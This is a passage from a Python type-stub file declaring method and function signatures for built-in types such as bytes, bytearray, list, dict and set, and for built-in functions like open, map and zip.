def removeprefix(self, __prefix: bytes) -> bytes: ...
def removesuffix(self, __suffix: bytes) -> bytes: ...
def rfind(self, __sub: Union[bytes, int], __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
def rindex(self, __sub: Union[bytes, int], __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
def rjust(self, __width: int, __fillchar: bytes = ...) -> bytes: ...
def rpartition(self, __sep: bytes) -> Tuple[bytes, bytes, bytes]: ...
def rsplit(self, sep: Optional[bytes] = ..., maxsplit: int = ...) -> List[bytes]: ...
def rstrip(self, __bytes: Optional[bytes] = ...) -> bytes: ...
def split(self, sep: Optional[bytes] = ..., maxsplit: int = ...) -> List[bytes]: ...
def splitlines(self, keepends: bool = ...) -> List[bytes]: ...
def startswith(
self, __prefix: Union[bytes, Tuple[bytes, ...]], __start: Optional[int] = ..., __end: Optional[int] = ...
) -> bool: ...
def strip(self, __bytes: Optional[bytes] = ...) -> bytes: ...
def swapcase(self) -> bytes: ...
def title(self) -> bytes: ...
def translate(self, __table: Optional[bytes], delete: bytes = ...) -> bytes: ...
def upper(self) -> bytes: ...
def zfill(self, __width: int) -> bytes: ...
@classmethod
def fromhex(cls, __s: str) -> bytes: ...
@classmethod
def maketrans(cls, frm: bytes, to: bytes) -> bytes: ...
def __len__(self) -> int: ...
def __iter__(self) -> Iterator[int]: ...
def __str__(self) -> str: ...
def __repr__(self) -> str: ...
def __int__(self) -> int: ...
def __float__(self) -> float: ...
def __hash__(self) -> int: ...
@overload
def __getitem__(self, i: int) -> int: ...
@overload
def __getitem__(self, s: slice) -> bytes: ...
def __add__(self, s: bytes) -> bytes: ...
def __mul__(self, n: int) -> bytes: ...
def __rmul__(self, n: int) -> bytes: ...
def __mod__(self, value: Any) -> bytes: ...
# Incompatible with Sequence.__contains__
def __contains__(self, o: Union[int, bytes]) -> bool: ... # type: ignore
def __eq__(self, x: object) -> bool: ...
def __ne__(self, x: object) -> bool: ...
def __lt__(self, x: bytes) -> bool: ...
def __le__(self, x: bytes) -> bool: ...
def __gt__(self, x: bytes) -> bool: ...
def __ge__(self, x: bytes) -> bool: ...
def __getnewargs__(self) -> Tuple[bytes]: ...
class bytearray(MutableSequence[int], ByteString):
@overload
def __init__(self) -> None: ...
@overload
def __init__(self, ints: Iterable[int]) -> None: ...
@overload
def __init__(self, string: str, encoding: str, errors: str = ...) -> None: ...
@overload
def __init__(self, length: int) -> None: ...
def capitalize(self) -> bytearray: ...
def center(self, __width: int, __fillchar: bytes = ...) -> bytearray: ...
def count(self, __sub: Union[bytes, int], __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
def copy(self) -> bytearray: ...
def decode(self, encoding: str = ..., errors: str = ...) -> str: ...
def endswith(
self, __suffix: Union[bytes, Tuple[bytes, ...]], __start: Optional[int] = ..., __end: Optional[int] = ...
) -> bool: ...
def expandtabs(self, tabsize: int = ...) -> bytearray: ...
def find(self, __sub: Union[bytes, int], __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
if sys.version_info >= (3, 8):
def hex(self, sep: Union[str, bytes] = ..., bytes_per_sep: int = ...) -> str: ...
else:
def hex(self) -> str: ...
def index(self, __sub: Union[bytes, int], __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
def insert(self, __index: int, __item: int) -> None: ...
def isalnum(self) -> bool: ...
def isalpha(self) -> bool: ...
if sys.version_info >= (3, 7):
def isascii(self) -> bool: ...
def isdigit(self) -> bool: ...
def islower(self) -> bool: ...
def isspace(self) -> bool: ...
def istitle(self) -> bool: ...
def isupper(self) -> bool: ...
def join(self, __iterable_of_bytes: Iterable[Union[ByteString, memoryview]]) -> bytearray: ...
def ljust(self, __width: int, __fillchar: bytes = ...) -> bytearray: ...
def lower(self) -> bytearray: ...
def lstrip(self, __bytes: Optional[bytes] = ...) -> bytearray: ...
def partition(self, __sep: bytes) -> Tuple[bytearray, bytearray, bytearray]: ...
if sys.version_info >= (3, 9):
def removeprefix(self, __prefix: bytes) -> bytearray: ...
def removesuffix(self, __suffix: bytes) -> bytearray: ...
def replace(self, __old: bytes, __new: bytes, __count: int = ...) -> bytearray: ...
def rfind(self, __sub: Union[bytes, int], __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
def rindex(self, __sub: Union[bytes, int], __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
def rjust(self, __width: int, __fillchar: bytes = ...) -> bytearray: ...
def rpartition(self, __sep: bytes) -> Tuple[bytearray, bytearray, bytearray]: ...
def rsplit(self, sep: Optional[bytes] = ..., maxsplit: int = ...) -> List[bytearray]: ...
def rstrip(self, __bytes: Optional[bytes] = ...) -> bytearray: ...
def split(self, sep: Optional[bytes] = ..., maxsplit: int = ...) -> List[bytearray]: ...
def splitlines(self, keepends: bool = ...) -> List[bytearray]: ...
def startswith(
self, __prefix: Union[bytes, Tuple[bytes, ...]], __start: Optional[int] = ..., __end: Optional[int] = ...
) -> bool: ...
def strip(self, __bytes: Optional[bytes] = ...) -> bytearray: ...
def swapcase(self) -> bytearray: ...
def title(self) -> bytearray: ...
def translate(self, __table: Optional[bytes], delete: bytes = ...) -> bytearray: ...
def upper(self) -> bytearray: ...
def zfill(self, __width: int) -> bytearray: ...
@classmethod
def fromhex(cls, __string: str) -> bytearray: ...
@classmethod
def maketrans(cls, __frm: bytes, __to: bytes) -> bytes: ...
def __len__(self) -> int: ...
def __iter__(self) -> Iterator[int]: ...
def __str__(self) -> str: ...
def __repr__(self) -> str: ...
def __int__(self) -> int: ...
def __float__(self) -> float: ...
__hash__: None # type: ignore
@overload
def __getitem__(self, i: int) -> int: ...
@overload
def __getitem__(self, s: slice) -> bytearray: ...
@overload
def __setitem__(self, i: int, x: int) -> None: ...
@overload
def __setitem__(self, s: slice, x: Union[Iterable[int], bytes]) -> None: ...
def __delitem__(self, i: Union[int, slice]) -> None: ...
def __add__(self, s: bytes) -> bytearray: ...
def __iadd__(self, s: Iterable[int]) -> bytearray: ...
def __mul__(self, n: int) -> bytearray: ...
def __rmul__(self, n: int) -> bytearray: ...
def __imul__(self, n: int) -> bytearray: ...
def __mod__(self, value: Any) -> bytes: ...
# Incompatible with Sequence.__contains__
def __contains__(self, o: Union[int, bytes]) -> bool: ... # type: ignore
def __eq__(self, x: object) -> bool: ...
def __ne__(self, x: object) -> bool: ...
def __lt__(self, x: bytes) -> bool: ...
def __le__(self, x: bytes) -> bool: ...
def __gt__(self, x: bytes) -> bool: ...
def __ge__(self, x: bytes) -> bool: ...
class memoryview(Sized, Container[int]):
format: str
itemsize: int
shape: Optional[Tuple[int, ...]]
strides: Optional[Tuple[int, ...]]
suboffsets: Optional[Tuple[int, ...]]
readonly: bool
ndim: int
obj: Union[bytes, bytearray]
c_contiguous: bool
f_contiguous: bool
contiguous: bool
nbytes: int
def __init__(self, obj: ReadableBuffer) -> None: ...
def __enter__(self) -> memoryview: ...
def __exit__(
self, exc_type: Optional[Type[BaseException]], exc_val: Optional[BaseException], exc_tb: Optional[TracebackType]
) -> None: ...
def cast(self, format: str, shape: Union[List[int], Tuple[int]] = ...) -> memoryview: ...
@overload
def __getitem__(self, i: int) -> int: ...
@overload
def __getitem__(self, s: slice) -> memoryview: ...
def __contains__(self, x: object) -> bool: ...
def __iter__(self) -> Iterator[int]: ...
def __len__(self) -> int: ...
@overload
def __setitem__(self, s: slice, o: bytes) -> None: ...
@overload
def __setitem__(self, i: int, o: int) -> None: ...
if sys.version_info >= (3, 8):
def tobytes(self, order: Optional[Literal["C", "F", "A"]] = ...) -> bytes: ...
else:
def tobytes(self) -> bytes: ...
def tolist(self) -> List[int]: ...
if sys.version_info >= (3, 8):
def toreadonly(self) -> memoryview: ...
def release(self) -> None: ...
if sys.version_info >= (3, 8):
def hex(self, sep: Union[str, bytes] = ..., bytes_per_sep: int = ...) -> str: ...
else:
def hex(self) -> str: ...
class bool(int):
def __new__(cls: Type[_T], __o: object = ...) -> _T: ...
@overload
def __and__(self, x: bool) -> bool: ...
@overload
def __and__(self, x: int) -> int: ...
@overload
def __or__(self, x: bool) -> bool: ...
@overload
def __or__(self, x: int) -> int: ...
@overload
def __xor__(self, x: bool) -> bool: ...
@overload
def __xor__(self, x: int) -> int: ...
@overload
def __rand__(self, x: bool) -> bool: ...
@overload
def __rand__(self, x: int) -> int: ...
@overload
def __ror__(self, x: bool) -> bool: ...
@overload
def __ror__(self, x: int) -> int: ...
@overload
def __rxor__(self, x: bool) -> bool: ...
@overload
def __rxor__(self, x: int) -> int: ...
def __getnewargs__(self) -> Tuple[int]: ...
class slice(object):
start: Any
step: Any
stop: Any
@overload
def __init__(self, stop: Any) -> None: ...
@overload
def __init__(self, start: Any, stop: Any, step: Any = ...) -> None: ...
__hash__: None # type: ignore
def indices(self, len: int) -> Tuple[int, int, int]: ...
class tuple(Sequence[_T_co], Generic[_T_co]):
def __new__(cls: Type[_T], iterable: Iterable[_T_co] = ...) -> _T: ...
def __len__(self) -> int: ...
def __contains__(self, x: object) -> bool: ...
@overload
def __getitem__(self, x: int) -> _T_co: ...
@overload
def __getitem__(self, x: slice) -> Tuple[_T_co, ...]: ...
def __iter__(self) -> Iterator[_T_co]: ...
def __lt__(self, x: Tuple[_T_co, ...]) -> bool: ...
def __le__(self, x: Tuple[_T_co, ...]) -> bool: ...
def __gt__(self, x: Tuple[_T_co, ...]) -> bool: ...
def __ge__(self, x: Tuple[_T_co, ...]) -> bool: ...
@overload
def __add__(self, x: Tuple[_T_co, ...]) -> Tuple[_T_co, ...]: ...
@overload
def __add__(self, x: Tuple[Any, ...]) -> Tuple[Any, ...]: ...
def __mul__(self, n: int) -> Tuple[_T_co, ...]: ...
def __rmul__(self, n: int) -> Tuple[_T_co, ...]: ...
def count(self, __value: Any) -> int: ...
def index(self, __value: Any, __start: int = ..., __stop: int = ...) -> int: ...
if sys.version_info >= (3, 9):
def __class_getitem__(cls, item: Any) -> GenericAlias: ...
class function:
# TODO not defined in builtins!
__name__: str
__module__: str
__code__: CodeType
__qualname__: str
__annotations__: Dict[str, Any]
class list(MutableSequence[_T], Generic[_T]):
@overload
def __init__(self) -> None: ...
@overload
def __init__(self, iterable: Iterable[_T]) -> None: ...
def clear(self) -> None: ...
def copy(self) -> List[_T]: ...
def append(self, __object: _T) -> None: ...
def extend(self, __iterable: Iterable[_T]) -> None: ...
def pop(self, __index: int = ...) -> _T: ...
def index(self, __value: _T, __start: int = ..., __stop: int = ...) -> int: ...
def count(self, __value: _T) -> int: ...
def insert(self, __index: int, __object: _T) -> None: ...
def remove(self, __value: _T) -> None: ...
def reverse(self) -> None: ...
@overload
def sort(self: List[SupportsLessThanT], *, key: None = ..., reverse: bool = ...) -> None: ...
@overload
def sort(self, *, key: Callable[[_T], SupportsLessThan], reverse: bool = ...) -> None: ...
def __len__(self) -> int: ...
def __iter__(self) -> Iterator[_T]: ...
def __str__(self) -> str: ...
__hash__: None # type: ignore
@overload
def __getitem__(self, i: _SupportsIndex) -> _T: ...
@overload
def __getitem__(self, s: slice) -> List[_T]: ...
@overload
def __setitem__(self, i: _SupportsIndex, o: _T) -> None: ...
@overload
def __setitem__(self, s: slice, o: Iterable[_T]) -> None: ...
def __delitem__(self, i: Union[_SupportsIndex, slice]) -> None: ...
def __add__(self, x: List[_T]) -> List[_T]: ...
def __iadd__(self: _S, x: Iterable[_T]) -> _S: ...
def __mul__(self, n: int) -> List[_T]: ...
def __rmul__(self, n: int) -> List[_T]: ...
def __imul__(self: _S, n: int) -> _S: ...
def __contains__(self, o: object) -> bool: ...
def __reversed__(self) -> Iterator[_T]: ...
def __gt__(self, x: List[_T]) -> bool: ...
def __ge__(self, x: List[_T]) -> bool: ...
def __lt__(self, x: List[_T]) -> bool: ...
def __le__(self, x: List[_T]) -> bool: ...
if sys.version_info >= (3, 9):
def __class_getitem__(cls, item: Any) -> GenericAlias: ...
class dict(MutableMapping[_KT, _VT], Generic[_KT, _VT]):
@overload
def __init__(self: Dict[_KT, _VT]) -> None: ...
@overload
def __init__(self: Dict[str, _VT], **kwargs: _VT) -> None: ...
@overload
def __init__(self, map: SupportsKeysAndGetItem[_KT, _VT], **kwargs: _VT) -> None: ...
@overload
def __init__(self, iterable: Iterable[Tuple[_KT, _VT]], **kwargs: _VT) -> None: ...
def __new__(cls: Type[_T1], *args: Any, **kwargs: Any) -> _T1: ...
def clear(self) -> None: ...
def copy(self) -> Dict[_KT, _VT]: ...
def popitem(self) -> Tuple[_KT, _VT]: ...
def setdefault(self, __key: _KT, __default: _VT = ...) -> _VT: ...
@overload
def update(self, __m: Mapping[_KT, _VT], **kwargs: _VT) -> None: ...
@overload
def update(self, __m: Iterable[Tuple[_KT, _VT]], **kwargs: _VT) -> None: ...
@overload
def update(self, **kwargs: _VT) -> None: ...
def keys(self) -> KeysView[_KT]: ...
def values(self) -> ValuesView[_VT]: ...
def items(self) -> ItemsView[_KT, _VT]: ...
@classmethod
@overload
def fromkeys(cls, __iterable: Iterable[_T]) -> Dict[_T, Any]: ...
@classmethod
@overload
def fromkeys(cls, __iterable: Iterable[_T], __value: _S) -> Dict[_T, _S]: ...
def __len__(self) -> int: ...
def __getitem__(self, k: _KT) -> _VT: ...
def __setitem__(self, k: _KT, v: _VT) -> None: ...
def __delitem__(self, v: _KT) -> None: ...
def __iter__(self) -> Iterator[_KT]: ...
if sys.version_info >= (3, 8):
def __reversed__(self) -> Iterator[_KT]: ...
def __str__(self) -> str: ...
__hash__: None # type: ignore
if sys.version_info >= (3, 9):
def __class_getitem__(cls, item: Any) -> GenericAlias: ...
def __or__(self, __value: Mapping[_KT, _VT]) -> Dict[_KT, _VT]: ...
def __ior__(self, __value: Mapping[_KT, _VT]) -> Dict[_KT, _VT]: ...
class set(MutableSet[_T], Generic[_T]):
def __init__(self, iterable: Iterable[_T] = ...) -> None: ...
def add(self, element: _T) -> None: ...
def clear(self) -> None: ...
def copy(self) -> Set[_T]: ...
def difference(self, *s: Iterable[Any]) -> Set[_T]: ...
def difference_update(self, *s: Iterable[Any]) -> None: ...
def discard(self, element: _T) -> None: ...
def intersection(self, *s: Iterable[Any]) -> Set[_T]: ...
def intersection_update(self, *s: Iterable[Any]) -> None: ...
def isdisjoint(self, s: Iterable[Any]) -> bool: ...
def issubset(self, s: Iterable[Any]) -> bool: ...
def issuperset(self, s: Iterable[Any]) -> bool: ...
def pop(self) -> _T: ...
def remove(self, element: _T) -> None: ...
def symmetric_difference(self, s: Iterable[_T]) -> Set[_T]: ...
def symmetric_difference_update(self, s: Iterable[_T]) -> None: ...
def union(self, *s: Iterable[_T]) -> Set[_T]: ...
def update(self, *s: Iterable[_T]) -> None: ...
def __len__(self) -> int: ...
def __contains__(self, o: object) -> bool: ...
def __iter__(self) -> Iterator[_T]: ...
def __str__(self) -> str: ...
def __and__(self, s: AbstractSet[object]) -> Set[_T]: ...
def __iand__(self, s: AbstractSet[object]) -> Set[_T]: ...
def __or__(self, s: AbstractSet[_S]) -> Set[Union[_T, _S]]: ...
def __ior__(self, s: AbstractSet[_S]) -> Set[Union[_T, _S]]: ...
def __sub__(self, s: AbstractSet[Optional[_T]]) -> Set[_T]: ...
def __isub__(self, s: AbstractSet[Optional[_T]]) -> Set[_T]: ...
def __xor__(self, s: AbstractSet[_S]) -> Set[Union[_T, _S]]: ...
def __ixor__(self, s: AbstractSet[_S]) -> Set[Union[_T, _S]]: ...
def __le__(self, s: AbstractSet[object]) -> bool: ...
def __lt__(self, s: AbstractSet[object]) -> bool: ...
def __ge__(self, s: AbstractSet[object]) -> bool: ...
def __gt__(self, s: AbstractSet[object]) -> bool: ...
__hash__: None # type: ignore
if sys.version_info >= (3, 9):
def __class_getitem__(cls, item: Any) -> GenericAlias: ...
class frozenset(AbstractSet[_T_co], Generic[_T_co]):
def __init__(self, iterable: Iterable[_T_co] = ...) -> None: ...
def copy(self) -> FrozenSet[_T_co]: ...
def difference(self, *s: Iterable[object]) -> FrozenSet[_T_co]: ...
def intersection(self, *s: Iterable[object]) -> FrozenSet[_T_co]: ...
def isdisjoint(self, s: Iterable[_T_co]) -> bool: ...
def issubset(self, s: Iterable[object]) -> bool: ...
def issuperset(self, s: Iterable[object]) -> bool: ...
def symmetric_difference(self, s: Iterable[_T_co]) -> FrozenSet[_T_co]: ...
def union(self, *s: Iterable[_T_co]) -> FrozenSet[_T_co]: ...
def __len__(self) -> int: ...
def __contains__(self, o: object) -> bool: ...
def __iter__(self) -> Iterator[_T_co]: ...
def __str__(self) -> str: ...
def __and__(self, s: AbstractSet[_T_co]) -> FrozenSet[_T_co]: ...
def __or__(self, s: AbstractSet[_S]) -> FrozenSet[Union[_T_co, _S]]: ...
def __sub__(self, s: AbstractSet[_T_co]) -> FrozenSet[_T_co]: ...
def __xor__(self, s: AbstractSet[_S]) -> FrozenSet[Union[_T_co, _S]]: ...
def __le__(self, s: AbstractSet[object]) -> bool: ...
def __lt__(self, s: AbstractSet[object]) -> bool: ...
def __ge__(self, s: AbstractSet[object]) -> bool: ...
def __gt__(self, s: AbstractSet[object]) -> bool: ...
if sys.version_info >= (3, 9):
def __class_getitem__(cls, item: Any) -> GenericAlias: ...
class enumerate(Iterator[Tuple[int, _T]], Generic[_T]):
def __init__(self, iterable: Iterable[_T], start: int = ...) -> None: ...
def __iter__(self) -> Iterator[Tuple[int, _T]]: ...
def __next__(self) -> Tuple[int, _T]: ...
if sys.version_info >= (3, 9):
def __class_getitem__(cls, item: Any) -> GenericAlias: ...
class range(Sequence[int]):
start: int
stop: int
step: int
@overload
def __init__(self, stop: _SupportsIndex) -> None: ...
@overload
def __init__(self, start: _SupportsIndex, stop: _SupportsIndex, step: _SupportsIndex = ...) -> None: ...
def count(self, value: int) -> int: ...
def index(self, value: int) -> int: ... # type: ignore
def __len__(self) -> int: ...
def __contains__(self, o: object) -> bool: ...
def __iter__(self) -> Iterator[int]: ...
@overload
def __getitem__(self, i: _SupportsIndex) -> int: ...
@overload
def __getitem__(self, s: slice) -> range: ...
def __repr__(self) -> str: ...
def __reversed__(self) -> Iterator[int]: ...
class property(object):
def __init__(
self,
fget: Optional[Callable[[Any], Any]] = ...,
fset: Optional[Callable[[Any, Any], None]] = ...,
fdel: Optional[Callable[[Any], None]] = ...,
doc: Optional[str] = ...,
) -> None: ...
def getter(self, fget: Callable[[Any], Any]) -> property: ...
def setter(self, fset: Callable[[Any, Any], None]) -> property: ...
def deleter(self, fdel: Callable[[Any], None]) -> property: ...
def __get__(self, obj: Any, type: Optional[type] = ...) -> Any: ...
def __set__(self, obj: Any, value: Any) -> None: ...
def __delete__(self, obj: Any) -> None: ...
def fget(self) -> Any: ...
def fset(self, value: Any) -> None: ...
def fdel(self) -> None: ...
class _NotImplementedType(Any): # type: ignore
# A little weird, but typing the __call__ as NotImplemented makes the error message
# for NotImplemented() much better
__call__: NotImplemented # type: ignore
NotImplemented: _NotImplementedType
def abs(__x: SupportsAbs[_T]) -> _T: ...
def all(__iterable: Iterable[object]) -> bool: ...
def any(__iterable: Iterable[object]) -> bool: ...
def ascii(__obj: object) -> str: ...
def bin(__number: Union[int, _SupportsIndex]) -> str: ...
if sys.version_info >= (3, 7):
def breakpoint(*args: Any, **kws: Any) -> None: ...
def callable(__obj: object) -> bool: ...
def chr(__i: int) -> str: ...
# This class is to be exported as PathLike from os,
# but we define it here as _PathLike to avoid import cycle issues.
# See https://github.com/python/typeshed/pull/991#issuecomment-288160993
_AnyStr_co = TypeVar("_AnyStr_co", str, bytes, covariant=True)
@runtime_checkable
class _PathLike(Protocol[_AnyStr_co]):
def __fspath__(self) -> _AnyStr_co: ...
if sys.version_info >= (3, 8):
def compile(
source: Union[str, bytes, mod, AST],
filename: Union[str, bytes, _PathLike[Any]],
mode: str,
flags: int = ...,
dont_inherit: int = ...,
optimize: int = ...,
*,
_feature_version: int = ...,
) -> Any: ...
else:
def compile(
source: Union[str, bytes, mod, AST],
filename: Union[str, bytes, _PathLike[Any]],
mode: str,
flags: int = ...,
dont_inherit: int = ...,
optimize: int = ...,
) -> Any: ...
def copyright() -> None: ...
def credits() -> None: ...
def delattr(__obj: Any, __name: str) -> None: ...
def dir(__o: object = ...) -> List[str]: ...
@overload
def divmod(__x: SupportsDivMod[_T_contra, _T_co], __y: _T_contra) -> _T_co: ...
@overload
def divmod(__x: _T_contra, __y: SupportsRDivMod[_T_contra, _T_co]) -> _T_co: ...
def eval(
__source: Union[str, bytes, CodeType], __globals: Optional[Dict[str, Any]] = ..., __locals: Optional[Mapping[str, Any]] = ...
) -> Any: ...
def exec(
__source: Union[str, bytes, CodeType],
__globals: Optional[Dict[str, Any]] = ...,
__locals: Optional[Mapping[str, Any]] = ...,
) -> Any: ...
def exit(code: object = ...) -> NoReturn: ...
@overload
def filter(__function: None, __iterable: Iterable[Optional[_T]]) -> Iterator[_T]: ...
@overload
def filter(__function: Callable[[_T], Any], __iterable: Iterable[_T]) -> Iterator[_T]: ...
def format(__value: object, __format_spec: str = ...) -> str: ... # TODO unicode
def getattr(__o: Any, name: str, __default: Any = ...) -> Any: ...
def globals() -> Dict[str, Any]: ...
def hasattr(__obj: Any, __name: str) -> bool: ...
def hash(__obj: object) -> int: ...
def help(*args: Any, **kwds: Any) -> None: ...
def hex(__number: Union[int, _SupportsIndex]) -> str: ...
def id(__obj: object) -> int: ...
def input(__prompt: Any = ...) -> str: ...
@overload
def iter(__iterable: Iterable[_T]) -> Iterator[_T]: ...
@overload
def iter(__function: Callable[[], Optional[_T]], __sentinel: None) -> Iterator[_T]: ...
@overload
def iter(__function: Callable[[], _T], __sentinel: Any) -> Iterator[_T]: ...
def isinstance(__obj: object, __class_or_tuple: Union[type, Tuple[Union[type, Tuple[Any, ...]], ...]]) -> bool: ...
def issubclass(__cls: type, __class_or_tuple: Union[type, Tuple[Union[type, Tuple[Any, ...]], ...]]) -> bool: ...
def len(__obj: Sized) -> int: ...
def license() -> None: ...
def locals() -> Dict[str, Any]: ...
@overload
def map(__func: Callable[[_T1], _S], __iter1: Iterable[_T1]) -> Iterator[_S]: ...
@overload
def map(__func: Callable[[_T1, _T2], _S], __iter1: Iterable[_T1], __iter2: Iterable[_T2]) -> Iterator[_S]: ...
@overload
def map(
__func: Callable[[_T1, _T2, _T3], _S], __iter1: Iterable[_T1], __iter2: Iterable[_T2], __iter3: Iterable[_T3]
) -> Iterator[_S]: ...
@overload
def map(
__func: Callable[[_T1, _T2, _T3, _T4], _S],
__iter1: Iterable[_T1],
__iter2: Iterable[_T2],
__iter3: Iterable[_T3],
__iter4: Iterable[_T4],
) -> Iterator[_S]: ...
@overload
def map(
__func: Callable[[_T1, _T2, _T3, _T4, _T5], _S],
__iter1: Iterable[_T1],
__iter2: Iterable[_T2],
__iter3: Iterable[_T3],
__iter4: Iterable[_T4],
__iter5: Iterable[_T5],
) -> Iterator[_S]: ...
@overload
def map(
__func: Callable[..., _S],
__iter1: Iterable[Any],
__iter2: Iterable[Any],
__iter3: Iterable[Any],
__iter4: Iterable[Any],
__iter5: Iterable[Any],
__iter6: Iterable[Any],
*iterables: Iterable[Any],
) -> Iterator[_S]: ...
@overload
def max(
__arg1: SupportsLessThanT, __arg2: SupportsLessThanT, *_args: SupportsLessThanT, key: None = ...
) -> SupportsLessThanT: ...
@overload
def max(__arg1: _T, __arg2: _T, *_args: _T, key: Callable[[_T], SupportsLessThanT]) -> _T: ...
@overload
def max(__iterable: Iterable[SupportsLessThanT], *, key: None = ...) -> SupportsLessThanT: ...
@overload
def max(__iterable: Iterable[_T], *, key: Callable[[_T], SupportsLessThanT]) -> _T: ...
@overload
def max(__iterable: Iterable[SupportsLessThanT], *, key: None = ..., default: _T) -> Union[SupportsLessThanT, _T]: ...
@overload
def max(__iterable: Iterable[_T1], *, key: Callable[[_T1], SupportsLessThanT], default: _T2) -> Union[_T1, _T2]: ...
@overload
def min(
__arg1: SupportsLessThanT, __arg2: SupportsLessThanT, *_args: SupportsLessThanT, key: None = ...
) -> SupportsLessThanT: ...
@overload
def min(__arg1: _T, __arg2: _T, *_args: _T, key: Callable[[_T], SupportsLessThanT]) -> _T: ...
@overload
def min(__iterable: Iterable[SupportsLessThanT], *, key: None = ...) -> SupportsLessThanT: ...
@overload
def min(__iterable: Iterable[_T], *, key: Callable[[_T], SupportsLessThanT]) -> _T: ...
@overload
def min(__iterable: Iterable[SupportsLessThanT], *, key: None = ..., default: _T) -> Union[SupportsLessThanT, _T]: ...
@overload
def min(__iterable: Iterable[_T1], *, key: Callable[[_T1], SupportsLessThanT], default: _T2) -> Union[_T1, _T2]: ...
@overload
def next(__i: Iterator[_T]) -> _T: ...
@overload
def next(__i: Iterator[_T], default: _VT) -> Union[_T, _VT]: ...
def oct(__number: Union[int, _SupportsIndex]) -> str: ...
_OpenFile = Union[AnyPath, int]
_Opener = Callable[[str, int], int]
# Text mode: always returns a TextIOWrapper
@overload
def open(
file: _OpenFile,
mode: OpenTextMode = ...,
buffering: int = ...,
encoding: Optional[str] = ...,
errors: Optional[str] = ...,
newline: Optional[str] = ...,
closefd: bool = ...,
opener: Optional[_Opener] = ...,
) -> TextIOWrapper: ...
# Unbuffered binary mode: returns a FileIO
@overload
def open(
file: _OpenFile,
mode: OpenBinaryMode,
buffering: Literal[0],
encoding: None = ...,
errors: None = ...,
newline: None = ...,
closefd: bool = ...,
opener: Optional[_Opener] = ...,
) -> FileIO: ...
# Buffering is on: return BufferedRandom, BufferedReader, or BufferedWriter
@overload
def open(
file: _OpenFile,
mode: OpenBinaryModeUpdating,
buffering: Literal[-1, 1] = ...,
encoding: None = ...,
errors: None = ...,
newline: None = ...,
closefd: bool = ...,
opener: Optional[_Opener] = ...,
) -> BufferedRandom: ...
@overload
def open(
file: _OpenFile,
mode: OpenBinaryModeWriting,
buffering: Literal[-1, 1] = ...,
encoding: None = ...,
errors: None = ...,
newline: None = ...,
closefd: bool = ...,
opener: Optional[_Opener] = ...,
) -> BufferedWriter: ...
@overload
def open(
file: _OpenFile,
mode: OpenBinaryModeReading,
buffering: Literal[-1, 1] = ...,
encoding: None = ...,
errors: None = ...,
newline: None = ...,
closefd: bool = ...,
opener: Optional[_Opener] = ...,
) -> BufferedReader: ...
# Buffering cannot be determined: fall back to BinaryIO
@overload
def open(
file: _OpenFile,
mode: OpenBinaryMode,
buffering: int,
encoding: None = ...,
errors: None = ...,
newline: None = ...,
closefd: bool = ...,
opener: Optional[_Opener] = ...,
) -> BinaryIO: ...
# Fallback if mode is not specified
@overload
def open(
file: _OpenFile,
mode: str,
buffering: int = ...,
encoding: Optional[str] = ...,
errors: Optional[str] = ...,
newline: Optional[str] = ...,
closefd: bool = ...,
opener: Optional[_Opener] = ...,
) -> IO[Any]: ...
def ord(__c: Union[str, bytes]) -> int: ...
def print(
*values: object,
sep: Optional[str] = ...,
end: Optional[str] = ...,
file: Optional[SupportsWrite[str]] = ...,
flush: bool = ...,
) -> None: ...
_E = TypeVar("_E", contravariant=True)
_M = TypeVar("_M", contravariant=True)
class _SupportsPow2(Protocol[_E, _T_co]):
def __pow__(self, __other: _E) -> _T_co: ...
class _SupportsPow3(Protocol[_E, _M, _T_co]):
def __pow__(self, __other: _E, __modulo: _M) -> _T_co: ...
if sys.version_info >= (3, 8):
@overload
def pow(base: int, exp: int, mod: None = ...) -> Any: ... # returns int or float depending on whether exp is non-negative
@overload
def pow(base: int, exp: int, mod: int) -> int: ...
@overload
def pow(base: float, exp: float, mod: None = ...) -> float: ...
@overload
def pow(base: _SupportsPow2[_E, _T_co], exp: _E) -> _T_co: ...
@overload
def pow(base: _SupportsPow3[_E, _M, _T_co], exp: _E, mod: _M) -> _T_co: ...
else:
@overload
def pow(
__base: int, __exp: int, __mod: None = ...
) -> Any: ... # returns int or float depending on whether exp is non-negative
@overload
def pow(__base: int, __exp: int, __mod: int) -> int: ...
@overload
def pow(__base: float, __exp: float, __mod: None = ...) -> float: ...
@overload
def pow(__base: _SupportsPow2[_E, _T_co], __exp: _E) -> _T_co: ...
@overload
def pow(__base: _SupportsPow3[_E, _M, _T_co], __exp: _E, __mod: _M) -> _T_co: ...
def quit(code: object = ...) -> NoReturn: ...
@overload
def reversed(__sequence: Sequence[_T]) -> Iterator[_T]: ...
@overload
def reversed(__sequence: Reversible[_T]) -> Iterator[_T]: ...
def repr(__obj: object) -> str: ...
@overload
def round(number: SupportsRound[Any]) -> int: ...
@overload
def round(number: SupportsRound[Any], ndigits: None) -> int: ...
@overload
def round(number: SupportsRound[_T], ndigits: int) -> _T: ...
def setattr(__obj: Any, __name: str, __value: Any) -> None: ...
@overload
def sorted(__iterable: Iterable[SupportsLessThanT], *, key: None = ..., reverse: bool = ...) -> List[SupportsLessThanT]: ...
@overload
def sorted(__iterable: Iterable[_T], *, key: Callable[[_T], SupportsLessThan], reverse: bool = ...) -> List[_T]: ...
if sys.version_info >= (3, 8):
@overload
def sum(__iterable: Iterable[_T]) -> Union[_T, int]: ...
@overload
def sum(__iterable: Iterable[_T], start: _S) -> Union[_T, _S]: ...
else:
@overload
def sum(__iterable: Iterable[_T]) -> Union[_T, int]: ...
@overload
def sum(__iterable: Iterable[_T], __start: _S) -> Union[_T, _S]: ...
def vars(__object: Any = ...) -> Dict[str, Any]: ...
@overload
def zip(__iter1: Iterable[_T1]) -> Iterator[Tuple[_T1]]: ...
@overload
def zip(__iter1: Iterable[_T1], __iter2: Iterable[_T2]) -> Iterator[Tuple[_T1, _T2]]: ...
@overload
def zip(__iter1: Iterable[_T1], __iter2: Iterable[_T2], __iter3: Iterable[_T3]) -> Iterator[Tuple[_T1, _T2, _T3]]: ...
@overload
def zip(
__iter1: Iterable[_T1], __iter2: Iterable[_T2], __iter3: Iterable[_T3], __iter4: Iterable[_T4]
) -> Iterator[Tuple[_T1, _T2, _T3, _T4]]: ...
